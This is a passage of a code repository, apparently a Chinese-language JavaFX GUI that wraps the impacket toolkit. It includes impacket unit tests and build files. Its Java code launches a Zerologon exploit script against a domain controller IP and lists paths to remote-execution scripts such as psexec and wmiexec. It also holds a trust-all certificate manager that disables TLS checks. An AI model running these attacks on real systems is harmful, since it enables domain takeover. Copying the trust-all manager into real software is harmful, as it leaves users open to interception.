61 | K = "6c3473624099e17ff3a39ff6bdf6cc38"
62 | # Mac = dbf63fd93c4296609e2d66bf79251cb5
63 | # Example 4: len = 45
64 | self.assertEqual(hex8(AES_CMAC(unhexlify(K), unhexlify(M), 45)),
65 | 'dbf63fd9 3c429660 9e2d66bf 79251cb5')
66 |
67 | def test_AES_CMAC_PRF_128(self):
68 | K = "000102030405060708090a0b0c0d0e0fedcb"
69 | M = "000102030405060708090a0b0c0d0e0f10111213"
70 |
71 | # AES-CMAC-PRF-128 Test Vectors
72 | # Example 1: len = 0, Key Length 18
73 | self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K), unhexlify(M), 18, len(unhexlify(M)))),
74 | '84a348a4 a45d235b abfffc0d 2b4da09a')
75 | # Example 1: len = 0, Key Length 16
76 | self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K)[:16], unhexlify(M), 16, len(unhexlify(M)))),
77 | '980ae87b 5f4c9c52 14f5b6a8 455e4c2d')
78 | # Example 1: len = 0, Key Length 10
79 | self.assertEqual(hex8(AES_CMAC_PRF_128(unhexlify(K)[:10], unhexlify(M), 10, len(unhexlify(M)))),
80 | '290d9e11 2edb09ee 141fcf64 c0b72f3d')
81 |
82 |
83 | if __name__ == "__main__":
84 | unittest.main(verbosity=1)
85 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_ip6_address.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import six
11 | import unittest
12 | from binascii import hexlify
13 | from impacket.IP6_Address import IP6_Address
14 |
15 |
16 | def hexl(b):
17 | return hexlify(b).decode('ascii')
18 |
19 |
20 | class IP6AddressTests(unittest.TestCase):
21 | def test_bin(self):
22 | tests = (("A:B:C:D:E:F:1:2", '000a000b000c000d000e000f00010002',
23 | "A:B:C:D:E:F:1:2"),
24 | ("A:B:0:D:E:F:0:2", '000a000b0000000d000e000f00000002',
25 | "A:B::D:E:F:0:2"),
26 | ("A::BC:E:D", '000a000000000000000000bc000e000d',
27 | "A::BC:E:D"),
28 | ("A::BCD:EFFF:D", '000a00000000000000000bcdefff000d',
29 | "A::BCD:EFFF:D"),
30 | ("FE80:0000:0000:0000:020C:29FF:FE26:E251",
31 | 'fe80000000000000020c29fffe26e251',
32 | "FE80::20C:29FF:FE26:E251"),
33 | ("::", '00000000000000000000000000000000',
34 | "::"),
35 | ("1::", '00010000000000000000000000000000',
36 | "1::"),
37 | ("::2", '00000000000000000000000000000002',
38 | "::2"),
39 | )
40 | # print IP6_Address("A::BC:E:D").as_string(False)
41 | for torig, thex, texp in tests:
42 | ip = IP6_Address(torig)
43 | byt = ip.as_bytes()
44 | self.assertEqual(hexl(byt), thex)
45 | self.assertEqual(ip.as_string(), texp)
46 |
47 | def test_malformed(self):
48 | with six.assertRaisesRegex(self, Exception, r'address size'):
49 | IP6_Address("ABCD:EFAB:1234:1234:1234:1234:1234:12345")
50 | with six.assertRaisesRegex(self, Exception, r'triple colon'):
51 | IP6_Address(":::")
52 | with six.assertRaisesRegex(self, Exception, r'triple colon'):
53 | IP6_Address("::::")
54 | # Could also test other invalid inputs
55 | # IP6_Address("AB:CD:EF")
56 | # IP6_Address("12::34::56")
57 | # IP6_Address("00BCDE::")
58 | # IP6_Address("DEFG::")
59 | # and how about these...
60 | # IP6_Address("A::0XBC:D")
61 | # IP6_Address("B:-123::")
62 | # IP6_Address("B:56 ::-0xE")
63 |
64 |
65 | if __name__ == '__main__':
66 | unittest.main(verbosity=1)
67 |
--------------------------------------------------------------------------------
/impacket/tests/misc/test_utils.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Utility and helper functions for the example scripts
12 | #
13 | import unittest
14 | from impacket.examples.utils import parse_target, parse_credentials
15 |
16 |
17 | class UtilsTests(unittest.TestCase):
18 |
19 | def test_parse_target(self):
20 | # Parse target returns a tuple with: domain, username, password, remote_name/address
21 | targets = {
22 | "": ("", "", "", ""),
23 | "HostName": ("", "", "", "HostName"),
24 | "UserName@HostName": ("", "UserName", "", "HostName"),
25 | "UserName:Password@HostName": ("", "UserName", "Password", "HostName"),
26 | "UserName:Pa$$word1234@HostName": ("", "UserName", "Pa$$word1234", "HostName"),
27 | "UserName:Password!#$@HostName": ("", "UserName", "Password!#$", "HostName"),
28 | "UserName:Passw@rd!#$@HostName": ("", "UserName", "Passw@rd!#$", "HostName"),
29 | "UserName:P@ssw@rd@!#$@HostName": ("", "UserName", "P@ssw@rd@!#$", "HostName"),
30 | "DOMAIN/UserName@HostName": ("DOMAIN", "UserName", "", "HostName"),
31 | "DOMAIN/:Password@HostName": ("DOMAIN", "", "Password", "HostName"),
32 | "DOMAIN/UserName:Password@HostName": ("DOMAIN", "UserName", "Password", "HostName"),
33 | "DOMAIN/UserName:Password/123@HostName": ("DOMAIN", "UserName", "Password/123", "HostName"),
34 | }
35 |
36 | for target, result in targets.items():
37 | self.assertTupleEqual(parse_target(target), result)
38 |
39 | def test_parse_credentials(self):
40 | # Parse credentials returns a tuple with: domain, username, password
41 | creds = {
42 | "": ("", "", ""),
43 | "UserName": ("", "UserName", ""),
44 | "UserName:Password": ("", "UserName", "Password"),
45 | "UserName:Password:123": ("", "UserName", "Password:123"),
46 | "DOMAIN/UserName": ("DOMAIN", "UserName", ""),
47 | "DOMAIN/UserName:Password": ("DOMAIN", "UserName", "Password"),
48 | "DOMAIN/UserName:Password/123": ("DOMAIN", "UserName", "Password/123"),
49 | }
50 |
51 | for cred, result in creds.items():
52 | self.assertTupleEqual(parse_credentials(cred), result)
53 |
54 |
55 | if __name__ == "__main__":
56 | unittest.main(verbosity=1)
57 |
--------------------------------------------------------------------------------
/impacket/tests/walkmodules.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # From https://stackoverflow.com/questions/1707709/list-all-the-modules-that-are-part-of-a-python-package
3 | import pkgutil
4 | import impacket
5 | package=impacket
6 | for importer, modname, ispkg in pkgutil.walk_packages(path=package.__path__,
7 | prefix=package.__name__+'.',
8 | onerror=lambda x: None):
9 | try:
10 | __import__(modname)
11 | except Exception as e:
12 | import traceback
13 | traceback.print_exc()
14 | print(e)
15 | pass
16 |
--------------------------------------------------------------------------------
/impacket/tox.ini:
--------------------------------------------------------------------------------
1 | # content of: tox.ini, put in same dir as setup.py
2 | [tox]
3 | envlist = clean,py{36,37,38,39,310,311},report
4 |
5 | [gh-actions]
6 | python =
7 | 3.6: py36
8 | 3.7: py37
9 | 3.8: py38
10 | 3.9: py39
11 | 3.10: py310
12 | 3.11: py311
13 |
14 | [testenv]
15 | deps = -r requirements-test.txt
16 | passenv = REMOTE_CONFIG
17 | commands =
18 | {envpython} -m pip check
19 | pytest --cov --cov-append --cov-context=test --cov-config=tox.ini {posargs}
20 | depends =
21 | py{36,37,38,39,310,311}: clean
22 | report: py{36,37,38,39,310,311}
23 |
24 | [testenv:clean]
25 | basepython = python3.8
26 | deps = coverage
27 | skip_install = true
28 | commands =
29 | coverage erase
30 |
31 | [testenv:report]
32 | basepython = python3.8
33 | deps = coverage
34 | skip_install = true
35 | commands =
36 | coverage report
37 | coverage html
38 |
39 | [testenv:py311]
40 | ignore_errors = true
41 |
42 | [pytest]
43 | markers =
44 | remote: marks tests as remote
45 |
46 | [coverage:run]
47 | branch = True
48 | source = impacket
49 | omit = *remcom*
50 | *.tox*
51 |
52 | [coverage:report]
53 | # Regexes for lines to exclude from consideration
54 | exclude_lines =
55 | # Have to re-enable the standard pragma
56 | pragma: no cover
57 |
58 | # Don't complain about missing debug-only code:
59 | if self\.debug
60 |
61 | # Don't complain if tests don't hit defensive assertion code:
62 | raise AssertionError
63 | raise NotImplementedError
64 |
65 | # Don't complain if non-runnable code isn't run:
66 | if 0:
67 | if __name__ == .__main__.:
68 |
69 | ignore_errors = True
70 |
71 | [coverage:html]
72 | show_contexts = True
73 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
3 | 4.0.0
4 |
5 | org.example
6 | gogogo
7 | 1.0-SNAPSHOT
8 |
9 | jar
10 |
11 | gogogo
12 | http://maven.apache.org
13 |
14 |
15 | UTF-8
16 |
17 |
18 |
19 |
20 | junit
21 | junit
22 | 3.8.1
23 | test
24 |
25 |
26 | com.jfoenix
27 | jfoenix
28 | 8.0.10
29 |
30 |
31 | cn.hutool
32 | hutool-all
33 | 5.8.8
34 |
35 |
36 | com.jcraft
37 | jsch
38 | 0.1.55
39 |
40 |
41 |
42 | net.sf.expectit
43 | expectit-core
44 | 0.9.0
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 | ${project.artifactId}
58 |
59 |
60 |
61 |
62 | org.apache.maven.plugins
63 | maven-assembly-plugin
64 | 3.3.0
65 |
66 |
67 |
68 | Main
69 |
70 |
71 |
72 |
73 | jar-with-dependencies
74 |
75 |
76 |
77 |
78 |
79 |
80 | make-assembly
81 | package
82 |
83 | single
84 |
85 |
86 |
87 |
88 |
89 | org.apache.maven.plugins
90 | maven-compiler-plugin
91 |
92 | 8
93 | 8
94 |
95 |
96 |
97 |
98 |
99 |
100 |
--------------------------------------------------------------------------------
/src/main/java/Main.java:
--------------------------------------------------------------------------------
1 | import cn.hutool.core.io.resource.ResourceUtil;
2 | import javafx.application.Application;
3 | import javafx.fxml.FXMLLoader;
4 | import javafx.scene.Parent;
5 | import javafx.scene.Scene;
6 | import javafx.scene.control.Alert;
7 | import javafx.scene.control.TextInputDialog;
8 | import javafx.stage.Stage;
9 | import javafx.stage.WindowEvent;
10 | import utils.Http.HttpTools;
11 | import utils.Http.Response;
12 |
13 | import java.net.URL;
14 | import java.util.HashMap;
15 | import java.util.Objects;
16 | import java.util.Optional;
17 |
18 | public class Main extends Application {
19 | public Main() {
20 | }
21 |
22 | public void start(Stage primaryStage) throws Exception {
23 | // // 密钥校验
24 | // boolean passwordCorrect = checkPassword();
25 | // if (!passwordCorrect) {
26 | // System.exit(0); // 密钥不正确,关闭应用程序
27 | // }
28 |
29 | Parent root = (Parent) FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
30 | primaryStage.setTitle("By Superman 20230902");
31 | Scene scene = new Scene(root, 1280.0, 910.0);
32 | scene.getStylesheets().add(((URL) Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
33 | primaryStage.setScene(scene);
34 | primaryStage.show();
35 |
36 | // 监听窗口关闭事件
37 | primaryStage.setOnCloseRequest((WindowEvent event) -> {
38 | System.exit(0); // 完全退出应用程序
39 | });
40 | }
41 |
42 | private boolean checkPassword() {
43 | boolean flag = false;
44 | HashMap headersMap = new HashMap<>();
45 | headersMap.put("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7");
46 | headersMap.put("Accept-Language", "zh-CN,zh;q=0.9");
47 |
48 | // 创建对话框
49 | TextInputDialog dialog = new TextInputDialog();
50 | dialog.setTitle("密钥校验");
51 | dialog.setHeaderText("请输入密钥");
52 | dialog.setContentText("密钥:");
53 |
54 | // 显示对话框并获取用户输入的密钥
55 | Optional result = dialog.showAndWait();
56 | if (result.isPresent()) {
57 | String key = result.get();
58 |
59 | // 发起密钥校验的请求
60 | String url = "http://124.222.32.173:8080/api/login?key=" + key;
61 | Response response = HttpTools.get(url, headersMap, "utf-8");
62 | System.out.println(response.getCode());
63 |
64 | if (response.getCode() == 500) {
65 | flag = true;
66 | } else {
67 | // 密钥不正确,显示警告对话框
68 | Alert alert = new Alert(Alert.AlertType.WARNING);
69 | alert.setTitle("密钥不正确");
70 | alert.setHeaderText("密钥校验失败");
71 | alert.setContentText("请输入正确的密钥!");
72 | alert.showAndWait();
73 | }
74 | }
75 |
76 | return flag;
77 | }
78 |
79 | public static void main(String[] args) {
80 | launch(args);
81 | }
82 | }
--------------------------------------------------------------------------------
/src/main/java/controller/DCController.java:
--------------------------------------------------------------------------------
1 | package controller;
2 |
3 | import cn.hutool.core.util.StrUtil;
4 | import javafx.application.Platform;
5 | import javafx.collections.FXCollections;
6 | import javafx.collections.ObservableList;
7 | import javafx.fxml.FXML;
8 | import javafx.scene.control.Button;
9 | import javafx.scene.control.ChoiceBox;
10 | import javafx.scene.control.TextArea;
11 | import javafx.scene.control.TextField;
12 | import javafx.scene.input.MouseEvent;
13 | import utils.Kinds_Coder;
14 |
15 | import static utils.Zerologon.ZerologonExec;
16 |
17 | public class DCController {
18 | private final Kinds_Coder coder = new Kinds_Coder();
19 |
20 | @FXML
21 | private TextField Ms17010_IP;
22 |
23 | @FXML
24 | private TextField Filed_Ms17010command;
25 |
26 | @FXML
27 | private ChoiceBox choiceBox_coder1;
28 |
29 | @FXML
30 | private Button Button_17010attack;
31 |
32 | @FXML
33 | private TextArea textArea_Ms17010;
34 |
35 | @FXML
36 | private TextField Ms17010_IPS;
37 |
38 | @FXML
39 | private Button Button_Ms17010Scan;
40 |
41 | @FXML
42 | private TextField textField_DCiP;
43 |
44 | @FXML
45 | private TextField textField_Domain;
46 |
47 | @FXML
48 | private ChoiceBox choiceBox_coder2;
49 |
50 | @FXML
51 | private Button Button_ZeroAtt;
52 |
53 | @FXML
54 | private TextArea textArea_ZeroResult;
55 |
56 | @FXML
57 | private TextField textField_DomainMachineName;
58 |
59 | @FXML
60 | void Ms17010Att_clicked(MouseEvent event) {
61 |
62 | }
63 |
64 | @FXML
65 | void Zerologon_clicked(MouseEvent event) {
66 |
67 | //获取IP
68 | String DC_IP;
69 | if (StrUtil.isBlank(textField_DCiP.getText())) {
70 | Platform.runLater(() -> {
71 | textField_DCiP.appendText("\n");
72 | textField_DCiP.appendText("请填写IP:");
73 | });
74 | return;
75 | }
76 | DC_IP = textField_DCiP.getText();
77 |
78 | //获取Domain
79 | String Domain;
80 | if (StrUtil.isBlank(textField_Domain.getText())) {
81 | Platform.runLater(() -> {
82 | textField_Domain.appendText("\n");
83 | textField_Domain.appendText("请填写Domain:");
84 | });
85 | return;
86 | }
87 | Domain = textField_Domain.getText();
88 |
89 | //获取机器用户名
90 | String DomainMachineName;
91 | if (StrUtil.isBlank(textField_DomainMachineName.getText())) {
92 | Platform.runLater(() -> {
93 | textField_DomainMachineName.appendText("\n");
94 | textField_DomainMachineName.appendText("请填写机器用户名:");
95 | });
96 | return;
97 | }
98 | DomainMachineName = textField_DomainMachineName.getText();
99 |
100 | String encoder2 = choiceBox_coder2.getValue();
101 | String ZeroResult = ZerologonExec(DC_IP, Domain, DomainMachineName, encoder2);
102 | Platform.runLater(() -> {
103 | textArea_ZeroResult.appendText("\n");
104 | if (ZeroResult.contains("OK")){
105 | textArea_ZeroResult.appendText(ZeroResult);
106 | } else {
107 | textArea_ZeroResult.appendText("漏洞攻击失败");
108 | }
109 |
110 | });
111 |
112 | }
113 |
114 | @FXML
115 | public void initialize() {
116 | ObservableList items = FXCollections.observableArrayList(coder.getKindList());
117 | choiceBox_coder1.setItems(items);
118 | choiceBox_coder1.setValue(items.get(0));
119 |
120 | ObservableList items2 = FXCollections.observableArrayList(coder.getKindList());
121 | choiceBox_coder2.setItems(items2);
122 | choiceBox_coder2.setValue(items2.get(0));
123 |
124 | Platform.runLater(() -> {
125 | textArea_Ms17010.appendText("\n");
126 | textArea_Ms17010.appendText("MS17010还没找到合适的脚本,找到了填充");
127 | });
128 |
129 | //适配屏幕
130 | System.setProperty("prism.allowhidpi", "true");
131 | }
132 | }
133 |
--------------------------------------------------------------------------------
/src/main/java/utils/Http/Cert.java:
--------------------------------------------------------------------------------
1 | package utils.Http;
2 |
3 | /**
4 | * @author yhy
5 | * @date 2021/8/20 23:25
6 | * @github https://github.com/yhy0
7 | */
8 |
9 | import javax.net.ssl.X509TrustManager;
10 | import java.security.cert.X509Certificate;
11 |
12 | public class Cert implements X509TrustManager {
13 | public Cert() {
14 | }
15 |
16 | public void checkClientTrusted(X509Certificate[] chain, String authType) {
17 | }
18 |
19 | public void checkServerTrusted(X509Certificate[] chain, String authType) {
20 | }
21 |
22 | public X509Certificate[] getAcceptedIssuers() {
23 | return null;
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/src/main/java/utils/Http/Response.java:
--------------------------------------------------------------------------------
1 | package utils.Http;
2 |
3 | /**
4 | * @author yhy
5 | * @date 2021/8/20 22:56
6 | * @github https://github.com/yhy0
7 | */
8 |
9 | public class Response {
10 | private int code;
11 | private String head;
12 | private String text;
13 | private String error;
14 |
15 | public Response() {
16 | }
17 |
18 | public Response(int code, String head, String text, String error) {
19 | this.code = code;
20 | this.head = head;
21 | this.text = text;
22 | this.error = error;
23 | }
24 |
25 | public int getCode() {
26 | return this.code;
27 | }
28 |
29 | public void setCode(int code) {
30 | this.code = code;
31 | }
32 |
33 | public String getHead() {
34 | return this.head;
35 | }
36 |
37 | public void setHead(String head) {
38 | this.head = head;
39 | }
40 |
41 | public String getText() {
42 | return this.text;
43 | }
44 |
45 | public void setText(String text) {
46 | this.text = text;
47 | }
48 |
49 | public String getError() {
50 | return this.error;
51 | }
52 |
53 | public void setError(String error) {
54 | this.error = error;
55 | }
56 | }
57 |
58 |
--------------------------------------------------------------------------------
/src/main/java/utils/ImpacketPath.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.io.*;
4 | import java.nio.charset.StandardCharsets;
5 | import java.util.Arrays;
6 |
7 | public class ImpacketPath {
8 |
9 |
10 | public static String Wmixexec = "./impacket/examples/wmiexec.py"; //wmiexec.py 用户名:密码@目标IP whoami
11 | public static String Psexec = "./impacket/examples/psexec.py";
12 | public static String SMBexec = "./impacket/examples/smbexec.py";
13 | public static String Atexec = "./impacket/examples/atexec.py";
14 | public static String DCOMexec = "./impacket/examples/DCOMexec.py";
15 |
16 | }
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/src/main/java/utils/Kinds_Coder.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.util.ArrayList;
4 |
5 | public class Kinds_Coder {
6 | private ArrayList Coderlist;
7 |
8 | /**
9 | * 构造器初始化数据
10 | */
11 | public Kinds_Coder() {
12 | this.coders();
13 | }
14 |
15 | public ArrayList coders() {
16 | Coderlist = new ArrayList<>();
17 | Coderlist.add("UTF-8");
18 | Coderlist.add("GBK");
19 | Coderlist.add("UTF-16");
20 | return Coderlist;
21 | }
22 |
23 | public ArrayList getKindList() {
24 | return Coderlist;
25 | }
26 |
27 | }
28 |
--------------------------------------------------------------------------------
/src/main/java/utils/Zerologon.java:
--------------------------------------------------------------------------------
1 | package utils;
2 |
3 | import java.io.BufferedReader;
4 | import java.io.IOException;
5 | import java.io.InputStreamReader;
6 |
7 | public class Zerologon {
8 | public static String zerologon = "impacket/examples/zerologon-Shot/zerologon-Shot.py";
9 |
10 | public static String ZerologonExec(String Dc_ip, String Domain, String DomainMachineName, String encoder) {
11 | StringBuilder output = new StringBuilder();
12 | try {
13 | String[] commandArgs = {"python", zerologon, Domain + "/" + "'" + DomainMachineName + "'" + "@" + Dc_ip, "-dc-ip", Dc_ip};
14 | String command = String.join(" ", commandArgs); // 将命令参数拼接成字符串
15 | System.out.println("Command: " + command); // 打印执行的命令
16 | Process process = Runtime.getRuntime().exec(commandArgs);
17 | BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream(), encoder));
18 | String line;
19 | while ((line = reader.readLine()) != null) {
20 | if (line.equals("")) {
21 | continue; // 跳过空行
22 | }
23 | output.append(line).append("\n");
24 | }
25 |
26 | int exitCode = process.waitFor();
27 | System.out.println("Exit Code: " + exitCode);
28 | } catch (IOException | InterruptedException e) {
29 | e.printStackTrace();
30 | }
31 | return output.toString();
32 | }
33 |
34 | }
35 |
--------------------------------------------------------------------------------
/src/main/resources/css/main.css:
--------------------------------------------------------------------------------
1 | /* 修改Tab中背景颜色*/
2 | .jfx-tab-pane .headers-region {
3 | -fx-background-color: #fff;
4 | }
5 |
6 | .jfx-tab-pane .tab-header-background {
7 | -fx-background-color: #fff;
8 | }
9 |
10 | /* 修改Tab中文本的颜色 */
11 | .tab-label {
12 | -fx-text-fill: #383838;
13 | -fx-font-family: Arial, 'Microsoft YaHei'
14 | }
15 |
16 | /* 子代选择器,Tab选中的时候选择其子元素tab-label */
17 | /*.tab:selected .tab-label {*/
18 | /* -fx-text-fill: #FF0088;*/
19 | /*}*/
20 | .tab:selected .tab-label {
21 | -fx-text-fill: #251eff;
22 | }
--------------------------------------------------------------------------------
/src/main/resources/fxml/DCgo.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
--------------------------------------------------------------------------------
/src/main/resources/fxml/Main.fxml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
19 |
24 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
--------------------------------------------------------------------------------
/src/test/java/org/example/AppTest.java:
--------------------------------------------------------------------------------
1 | package org.example;
2 |
3 | import junit.framework.Test;
4 | import junit.framework.TestCase;
5 | import junit.framework.TestSuite;
6 |
7 | /**
8 | * Unit test for simple App.
9 | */
10 | public class AppTest
11 | extends TestCase
12 | {
13 | /**
14 | * Create the test case
15 | *
16 | * @param testName name of the test case
17 | */
18 | public AppTest( String testName )
19 | {
20 | super( testName );
21 | }
22 |
23 | /**
24 | * @return the suite of tests being tested
25 | */
26 | public static Test suite()
27 | {
28 | return new TestSuite( AppTest.class );
29 | }
30 |
31 | /**
32 | * Rigourous Test :-)
33 | */
34 | public void testApp()
35 | {
36 | assertTrue( true );
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/文档.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/文档.pdf
--------------------------------------------------------------------------------